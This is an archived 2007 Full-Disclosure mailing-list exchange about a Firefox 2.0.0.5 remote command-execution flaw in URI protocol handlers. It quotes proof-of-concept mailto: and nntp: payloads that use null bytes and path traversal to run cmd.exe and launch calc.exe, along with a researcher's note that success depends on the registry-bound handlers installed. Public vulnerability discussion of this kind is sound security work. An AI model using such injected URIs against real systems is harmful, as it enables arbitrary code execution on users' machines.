|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Nate McFeters (nate.mcfeters
gmail.com)
Date: Wed Jul 25 2007 - 07:45:28 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Check out our blog on xs-sniper.com. There's more info there. This
flaw does somewhat depend upon what you have installed, as is
referenced on our blog page. Keep in mind that the URI's are tied to
commands thru the registry, and that those commands are where the
command injections go. If you have a different command from what we
have, then of course there's the chance it doesn't work.
Thanks,
Nate
On 7/25/07, Mesut EREN <merenbasakkiremit.com.tr> wrote:
>
>
>
> Hi all,
>
> FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But
> don't work is code.
>
> Example code is
>
> mailto:%00%00../../../../../../windows/system32/cmd".exe
> ../../../../../../../../windows/system32/calc.exe " - "
> blah.bat
>
> nntp:%00%00../../../../../../windows/system32/cmd".exe
> ../../../../../../../../windows/system32/calc.exe " - "
> blah.bat
>
> Where i missing?
>
>
>
> Mesut EREN
> BAŞAK ÇATI & CEPHE SİSTEMLERİ
> Bilgi İşlem Sorumlusu
>
> MCSA:S,MCSE:S,CEH,CCNA
>
> merenbasakkiremit.com.tr
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]